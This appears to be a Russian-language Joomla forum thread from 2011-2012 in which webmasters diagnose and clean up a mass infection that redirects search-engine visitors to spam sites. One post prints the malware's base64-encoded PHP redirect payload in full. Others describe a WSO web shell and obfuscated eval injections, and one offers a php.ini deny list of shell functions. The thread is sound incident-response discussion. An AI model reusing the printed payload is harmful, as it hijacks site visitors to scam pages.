0 Пользователей и 1 Гость просматривают эту тему.
  • 51 Ответов
  • 30751 Просмотров
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Доброго времени, форумчане.

Столкнулся с проблемой: со всех входящих ссылок происходит переадресация. Т.е. если ввести в ПС адрес сайта, а потом перейти, он перекинет сперва на http://goooogle.osa.pl, а потом по своему усмотрению (казино или диета). Если вбить напрямую, откроет сайт без проблем.

На VPS'ке дебиан, крутится десяток сайтов, все на J 1.5. И на всех такая байда. htaccess чистый.

Для пробы закидывал чистый index.html, с ПС идет нормально. Дальше начал рыть в index.php:

После удаления 21-ой строчки
Код
require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );

с ПС переходит, хоть и ругается ошибками.

Дальше я пошел в файл includes/defines.php и снова нарыл строку, после удаления которой с ПС сайт открывает, но так же, с ошибками
Код
$parts = explode( DS, JPATH_BASE );

Куда дальше?  !
« Последнее редактирование: 06.11.2011, 00:54:52 от asdf27 »
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация
« Ответ #1 : 06.11.2011, 00:00:53 »
Разобрался... Жаль что никто не помог, сэкономил бы время.

Был вирус, который редиректил на поиск, после на нужный сайт.

1. В теле php файла плагина найден код
Код
("DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwidHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhbmRleC5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtYWlsLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm1zbiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vayIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ29vb29nbGUub3NhLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));

Найти не сложно, у меня в 4000+ файлах был :) в самой шапке.

Далее, на сайте http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/ раскодировал, увидел присутствие урла, на который редиректит сайт.

Ну и через Notepad++ поисках в файлах - замена. Только муторно теперь, 10+ сайтов на серваке и каждый надо скачать, почистить и залить обратно :)
*

fedos23

  • Осваиваюсь на форуме
  • 35
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #2 : 29.12.2011, 11:27:28 »
А через что хакнули? неизвестно?
У меня такая же байда...
*

nsfgh

  • Новичок
  • 8
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #3 : 29.12.2011, 17:33:09 »
Тоже самое сегодня случилось, просто восстановил из резервной копии. В логах техподдержка хостинга не разобралась.
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #4 : 05.01.2012, 14:14:31 »
А через что хакнули? неизвестно?
У меня такая же байда...

На многих папках 777 стояли права. Но больше думаю на забытый, не удаленный Total cmd с сохраненным паролем.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #5 : 07.01.2012, 07:15:13 »
аналогичная проблема, редирект из поисковых систем.
посмотрел сайт, посмотрел здоровые файлы, не пойму, зачем надо было удалять require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
эта строка идёт в стандарте.

в индексе удалил почти такой же код Base 64, всё равно редиректит, как и от куда, не пойму.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #6 : 07.01.2012, 07:16:08 »
хакнули скорее всего через FTP, total CMD.
*

wishlight

  • Живу я здесь
  • 4879
  • 285 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Переадресация, Редирект, Вирус
« Ответ #7 : 07.01.2012, 09:34:42 »
И вам переписали все файлы. Я так понял, это был акт новогоднего вандализма. Надо перезаливать и вычищать.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #8 : 07.01.2012, 15:44:40 »
а что перезалить?? поискал выборочно, не вижу больше нигде такого кода.
index я вычистил, не пойму, что сейчас срабатывает?
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Переадресация, Редирект, Вирус
« Ответ #9 : 07.01.2012, 15:57:42 »
делай бекап распаковывай но локалке и через поиск в  Total Commander  ищи

потом в php.ini выставь так
Код
register_globals=Off
safe_mode=Off
allow_url_fopen=Off
allow_url_include=Off
disable_functions=show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
open_basedir=полный путь к вашей директории
*

wishlight

  • Живу я здесь
  • 4879
  • 285 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Переадресация, Редирект, Вирус
« Ответ #10 : 07.01.2012, 16:47:20 »
Текст реплейсер и ищет и заменяет. Понравился очень.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #11 : 07.01.2012, 17:28:38 »
инфицируются в основном два файла, но местами больше

это defines.php и index.php
*

wishlight

  • Живу я здесь
  • 4879
  • 285 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Переадресация, Редирект, Вирус
« Ответ #12 : 07.01.2012, 18:04:18 »
Это новогодняя вирусная атака. Почти 100% перегажены почти все файлы. Текст реплейсер найдет, какие именно :)
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #13 : 08.01.2012, 05:58:02 »
Пострадавшие, напишите на каком хосте.
Мои личне наблюдения, хакнули сайты только на хосте timeweb, остальные ресурсы не пострадали.
Вывод - это не тотал командер.
*

wishlight

  • Живу я здесь
  • 4879
  • 285 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Переадресация, Редирект, Вирус
« Ответ #14 : 08.01.2012, 10:48:54 »
Вполне возможно таймвеб хакнули?
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #15 : 08.01.2012, 17:10:54 »
У меня hc.ru . Для поиск хорошо подходит Notepad++.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #16 : 08.01.2012, 17:46:42 »
Ясно, значит не только timweb.
Но пришли со стороны хостера, сейчас логи буду изучать.
*

ASBorzakovsky

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #17 : 10.01.2012, 17:46:29 »
атака продолжается, только я всё зачистил, поменял все пароли и явки, два дня, все сайты опять загажены, один пациент очень сильно, загажены все php файлы, в одном файле по 10 раз, это трындец.....

Кстати не всё на CMS Joomla.
*

wishlight

  • Живу я здесь
  • 4879
  • 285 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Переадресация, Редирект, Вирус
« Ответ #18 : 10.01.2012, 19:26:32 »
Разве что перенести сайты на другого хостера, разбить на несколько аккаунтов, перед этим сменить пароли администраторов, залить поверх базы данных (снести все файлы и залить свежие версии).
*

madal

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #19 : 10.01.2012, 20:02:05 »
Сегодня сносил тот же самый вирус. Написали скрипт который все файлы заменял. Найдено аж 106тыс зараженных файлов.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
*

magyar

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #21 : 11.01.2012, 11:40:01 »
такая же байда больше 60 сайтов с этой хренью, 95% Joomla от 1.5.17 до 1.5.25 и 1.7.3, wordpress точно так же взломан, еще 4 сайта не на нашем хостинге. сейчас восстанавливаюсь, но что предпринять для предотвращения инцидента?
*

magyar

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #22 : 11.01.2012, 11:42:00 »
как думаете есть ли смысл в отдел "К" обращаться?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Переадресация, Редирект, Вирус
« Ответ #23 : 11.01.2012, 12:12:18 »
отдел "К" обращаться должен замученный вами хостер, а не вы
а вам необходимо на столько его замучить, или просто всем съехать разом и негатив написать везде, тогда он зашевелиться быстрее ^-^
*

asdf27

  • Захожу иногда
  • 120
  • 7 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #24 : 11.01.2012, 15:51:34 »
106к... Сколько же у вас сайт весит? :)
Вся проблема, как мне кажется, в правах на папки. Когда несколько доменов, аппач работает под одним юзверем, и сломав один домен, вирь легко пробирается в другие папки.

Всю ночь провозился со своим debian, но php как cgi так и не смог заставить работать. Видимо, придется менять хоста. Уже запарился чистить.
*

n55

  • Новичок
  • 4
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #25 : 12.01.2012, 18:32:39 »
У меня на Sweb также все сайта на Joomla заражены.
Причем на одном - всего два файлика, а на другом - ооочень много, больше сотни.


*

wishlight

  • Живу я здесь
  • 4879
  • 285 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Переадресация, Редирект, Вирус
« Ответ #26 : 12.01.2012, 19:00:14 »
Да уж... и смотрю все на больших хостингах.
*

shapeout

  • Осваиваюсь на форуме
  • 18
  • 0 / 0
  • все что связано с велосипедами - www.veloarena.ru
Re: Переадресация, Редирект, Вирус
« Ответ #27 : 14.01.2012, 12:21:06 »
Всем привет.
У меня тоже до НГ сайты хакнули.
Как я понял у меня было 4 вируса.
один - это eval(base64_decode потом идёт куча всего, что зашифрованно. (в основном вирус который редиректор)
второй - это шелл, в моём случае WSO 2 лежал в components/com_search файл называется class.php Если его внимательно посмотреть, то можно заметить куски того "зашифрованного гамна" из которого собирается первый  вирус, но это моё предположение. Еще нашел один шелл, один-в-один как этот, тока лежал в папке mod_myblog_arhive, внутри шелла есть описание его и кем написан.
Код
  * WSO 2
 * Web Shell by oRb
третье - это в папке plugins лежит папка mod в которой есть архив (сам себя заархивированный) и собсно сам по себе вирус. Он, как я понял, занимается спапом. Я просто снёс папку и всё. Особо разбираться некогда было.
четвертое - это всем уже (наверное) известный редиректор. :) сам редиректор выглядит как
Код
if(preg_match('!MIDP|WAP|Windows.CE и далее куча-куча перечислений
и второй
Код
<script>b=new функция, потом всё в зашифрованном виде типа [b]-t+число[/b]куча-куча
и всё это расшифровывается eval( - собсно по этому выражению я и искал.
Искал я всё это безобразие фаром по тексту в файле. Муторная скажу я Вам работёнка, но уж лучше в ручную, чем чё нить важное потереть... Возможно, что всё мной рассказанное - это одно целое.
Как я боролся.
Первым делом в корень сайта кинул файл .ftpaccess - с содержанием
Код
<Limit ALL>
Allow from 127.0.0.1 // здесь IP разрешенному доступ
Deny from all // всем (остальным) запретить
ListOptions "+a" // скрыть все файлы начинающиеся с точки
</Limit>
Можно еще в Google порыть, найти еще настроек.
Начал искать по тексту вируса, в каких еще файлах встречается... На всякий пожарный делал копии, изучал и искал. Собсно всё.
Ща еще базу буду проверять, вдруг там тоже нагадили.

Вот теперь сижу и думаю, как базу подчистить? Я там стока интересного нашел... Никто случаем не знает?
« Последнее редактирование: 14.01.2012, 22:42:42 от shapeout »
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Переадресация, Редирект, Вирус
« Ответ #28 : 14.01.2012, 13:25:30 »
Вот htaccess от Nicholas K. Dionysopoulos ведущего разработчика AkeebaBackup.com
возможно кто то что то найдет для себя полезное

Спойлер
[свернуть]

Это своего рода шаблон который требует некоторых изменений
__________________________________________________________________________

Также что то можно использовать отсюда

Спойлер
[свернуть]

*

mamedovvs

  • Новичок
  • 7
  • 0 / 0
Re: Переадресация, Редирект, Вирус
« Ответ #29 : 24.01.2012, 18:03:31 »
Та же проблема все сайты на Joomla заражены. Очистил и удалил все ftp аккаунты и что, через день та же хрень все заражены. Написал скриптик на python если нужно могу выложить, для поиска и удаления строки eval. Но главная причина понять почему так происходит, может быть нужно права расставить правильные.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Спам, вирус или дело в браузере Google

Автор alekcae

Ответов: 12
Просмотров: 290
Последний ответ Сегодня в 00:23:13
от Septdir
На сайте появился вирус

Автор Lifar

Ответов: 3
Просмотров: 137
Последний ответ 23.04.2021, 10:12:05
от ProtectYourSite
Всплывающее спам-сообщение+редирект на Joomla 2.5.14

Автор bonusfree

Ответов: 21
Просмотров: 404
Последний ответ 02.12.2020, 21:56:30
от bonusfree
Вирус на сайте, редирект, что делать как лечить!

Автор flyingspook

Ответов: 792
Просмотров: 253081
Последний ответ 23.02.2020, 21:18:16
от draff
Хостер пишет, что Обнаружен вирус

Автор imrangerga

Ответов: 4
Просмотров: 594
Последний ответ 10.11.2019, 14:22:37
от ProtectYourSite